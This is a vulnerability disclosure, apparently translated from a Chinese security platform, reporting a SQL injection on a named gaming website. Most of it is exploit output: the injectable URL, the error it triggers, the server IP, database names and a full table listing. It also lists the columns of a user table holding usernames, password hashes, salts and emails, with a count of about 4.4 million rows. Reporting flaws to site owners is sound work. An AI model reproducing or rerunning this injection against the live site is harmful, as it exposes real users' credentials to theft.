Brief description:
265g.com. Game nest. 440W data causes a large amount of user information leakage due to a severe SQL vulnerability in a substation. Please fix it in time
Detailed description:
Http://my.265g.com/flash.php? Fgid = 21'
MySQL Error
Message: MySQL Query Error
SQL: SELECT * FROM uchome_app_fgamelist Where fgid = 21'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Errno.: 1064
Click here to seek help.
Not much explanation. It is estimated that the data has been obtained by others.
Proof of vulnerability:
Target: http://my.265g.com/flash.php? Fgid = 21
Host IP: 219.129.216.204
Web Server: nginx
Powered-by: PHP/5.3.6
DB Server: MySQL error based
Resp. Time (avg): 204 MS
Current User: user@127.0.0.1
SQL Version: 5.5.11
Current DB: uchome
System User: user@127.0.0.1
Host Name: qyeee
Installation dir:/usr/local/mysql
DB User: 'user' @ '%'
Data Bases: information_schema
Discuz
G265
Test
Ucenter
Uchome
Count (table_name) of information_schema.tables where table_schema = 0x7563656E746572 is 33
Table found: code
Table found: uc_admins
Table found: uc_applications
Table found: uc_badwords
Table found: uc_domains
Table found: uc_failedlogins
Table found: uc_feeds
Table found: uc_friends
Table found: uc_mailqueue
Table found: uc_memberfields
Table found: uc_members
Table found: uc_mergemembers
Table found: uc_newpm
Table found: uc_notelist
Table found: uc_pm_indexes
Table found: uc_pm_lists
Table found: uc_pm_members
Table found: uc_pm_messages_0
Table found: uc_pm_messages_1
Table found: uc_pm_messages_2
Table found: uc_pm_messages_3
Table found: uc_pm_messages_4
Table found: uc_pm_messages_5
Table found: uc_pm_messages_6
Table found: uc_pm_messages_7
Table found: uc_pm_messages_8
Table found: uc_pm_messages_9
Table found: uc_protectedmembers
Table found: uc_settings
Table found: uc_sqlcache
Table found: uc_tags
Table found: uc_vars
Table found: uc_wb
Count (column_name) of information_schema.columns where table_schema = 0x7563656E746572 and table_name = 0x75635F6D656D62657273 is 15
Column found: uid
Column found: username
Column found: password
Column found: email
Column found: myid
Column found: myidkey
Column found: regip
Column found: regdate
Column found: lastloginip
Column found: lastlogintime
Column found: salt
Column found: secques
Column found: qdjf
Column found: qdjy
Column found: openid
Database: ucenter
Table: uc_members
[15 columns]
+ --------------- + ----------------------- +
| Column | Type |
+ --------------- + ----------------------- +
| Email | char (32) |
| Lastloginip | int (10) |
| Lastlogintime | int (10) unsigned |
| Myid | char (30) |
| Myidkey | char (16) |
| Openid | varchar (50) |
| Password | char (32) |
| Qdjf | int (11) |
| Qdjy | int (11) |
| Regdate | int (10) unsigned |
| Regip | char (15) |
| Salt | char (6) |
| Secques | char (8) |
| Uid | mediumint (8) unsigned |
| Username | char (15) |
+ --------------- + ----------------------- +
Count (*) of ucenter. uc_members is 4433975
It is omitted below.
Solution:
Filter
Author: Bloodwolf